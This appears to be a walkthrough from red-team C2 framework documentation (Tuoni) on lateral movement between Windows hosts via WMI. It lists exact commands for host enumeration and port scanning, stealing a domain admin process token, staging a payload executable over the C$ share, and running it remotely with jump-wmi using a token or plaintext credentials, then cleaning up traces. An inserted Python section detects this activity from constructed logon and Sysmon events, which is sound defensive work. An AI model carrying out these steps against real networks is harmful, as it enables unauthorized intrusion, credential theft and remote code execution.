Lateral Movement via WMI

This walkthrough covers moving from an initial foothold on one Windows host to a second target machine using WMI (jump-wmi). The same pattern applies to jump-service and jump-winrm - only the delivery mechanism changes.

Prerequisites

  • An active agent on the source machine (the initial foothold)
  • A payload generated for the target platform (Windows executable)
  • Credentials or a token with administrative access on the target machine
  • Network connectivity from the source machine to the target on TCP 135 (WMI/RPC)

Step 1 - Enumerate the environment

Before moving, confirm who you are and what is reachable.

Check the current identity:

run --cmdline "whoami /all"

List running processes to identify opportunities for token theft:

ps

Scan for live hosts and open ports on the internal network:

portscan --ips 10.10.10.0/24 --ports 135,445,3389 --hostDiscovery ICMP --timeout 500

Look for machines with TCP 135 open - these are candidates for WMI lateral movement.


Step 2 - Obtain credentials or a suitable token

Option A - Use a token stolen from a privileged process

If a process running as a domain admin is already on the current machine, steal its token:

ps

Identify a process owned by CORP\Administrator (e.g. PID 4832):

token-steal --pid 4832

With the token applied, jump-wmi will use it automatically - no plaintext credentials needed.

Option B - Use credentials directly

If you have plaintext credentials, pass them as parameters to jump-wmi.


Step 3 - Stage the payload

Generate an executable payload from the Payloads page for the target architecture (Windows x64 EXE). Note the payload ID.

Upload it to the target over an administrative share (C$ in the example below) using the current agent:

upload-payload --filepath \\10.10.10.20\C$\Windows\Temp\svc.exe --payloadId abc123

Alternatively, pass --copyMethod SMB in the jump-wmi command to have Tuoni stage the payload automatically.


Step 4 - Execute via WMI

With token (no plaintext credentials):

jump-wmi --target 10.10.10.20
  --payloadId abc123
  --copyMethod SMB
  --copyPath C:\Windows\Temp\svc.exe
  --cmdline C:\Windows\Temp\svc.exe

With plaintext credentials:

jump-wmi --target 10.10.10.20
  --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123
  --copyMethod SMB
  --copyPath C:\Windows\Temp\svc.exe
  --cmdline C:\Windows\Temp\svc.exe
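As an added detection-side example (not part of the Tuoni documentation), the following Python shows what the execution above looks like on the target from the defender's side: it correlates a Security 4624 network logon with a Sysmon process-creation event whose parent is WmiPrvSE.exe and whose logon session belongs to that remote caller. The event field names and sample records are constructed for illustration, not captured telemetry.

```python
import json
import ntpath

# Constructed events, not real telemetry: a Security 4624 network logon (type 3)
# followed by a Sysmon Event ID 1 process start under the same logon ID, plus
# benign noise (an interactive cmd.exe and local WMI activity under SYSTEM).
SAMPLE_LOG = r"""
{"Channel":"Security","EventID":4624,"Computer":"WS20","TargetLogonId":"0x3e7a1","LogonType":3,"TargetUserName":"Administrator","IpAddress":"10.10.10.10"}
{"Channel":"Sysmon","EventID":1,"Computer":"WS20","LogonId":"0x3e7a1","Image":"C:\\Windows\\Temp\\svc.exe","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"}
{"Channel":"Sysmon","EventID":1,"Computer":"WS20","LogonId":"0x1c2d3","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\explorer.exe"}
{"Channel":"Sysmon","EventID":1,"Computer":"WS20","LogonId":"0x3e7","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"}
"""

# Directories commonly used to stage a copied binary (assumed list, extend for your estate).
STAGING_DIRS = (r"c:\windows\temp", r"c:\users\public", r"c:\perflogs")


def parse_events(text):
    """Parse one JSON event per line, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_wmi_lateral_movement(events):
    """Return one finding per process spawned by WmiPrvSE.exe whose logon session
    was created by a network (type 3) logon, i.e. a remote WMI caller."""
    network_logons = {
        e["TargetLogonId"].lower(): e
        for e in events
        if e.get("Channel") == "Security" and e.get("EventID") == 4624 and e.get("LogonType") == 3
    }
    findings = []
    for e in events:
        if e.get("Channel") != "Sysmon" or e.get("EventID") != 1:
            continue
        if ntpath.basename(e["ParentImage"]).lower() != "wmiprvse.exe":
            continue
        logon = network_logons.get(e["LogonId"].lower())
        if logon is None:
            continue  # local WMI activity, not remote execution
        staged = e["Image"].lower().startswith(STAGING_DIRS)
        findings.append({
            "host": e["Computer"],
            "image": e["Image"],
            "source_ip": logon["IpAddress"],
            "user": logon["TargetUserName"],
            "severity": "high" if staged else "medium",  # staged binary raises the score
        })
    return findings


if __name__ == "__main__":
    for finding in detect_wmi_lateral_movement(parse_events(SAMPLE_LOG)):
        print(finding)
```

On the sample data the only finding is svc.exe started from C:\Windows\Temp by the 10.10.10.10 network logon; the interactive cmd.exe and the SYSTEM-owned WMIC.exe are left alone.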

Step 5 - Receive the new agent

Switch to the Agents page in the GUI. Within the agent's next callback interval, a new agent entry will appear connected from 10.10.10.20.

Tip

If the agent does not appear, check:

  • Firewall rules on TCP 135 between source and target
  • That the payload was copied successfully (verify via ls on the target path)
  • That WMI service (winmgmt) is running on the target

Step 6 - Clean up

From the new agent on 10.10.10.20, remove the staged binary:

rm --filepath C:\Windows\Temp\svc.exe

Revert the token on the source agent:

token-use --nr 0

Variations

Method           Command       Requirements
WMI              jump-wmi      TCP 135, admin credentials
Windows Service  jump-service  TCP 445, admin credentials, service creation rights
WinRM            jump-winrm    TCP 5985/5986, WinRM enabled, Remote Management Users
SSH              jump-ssh      TCP 22, SSH service running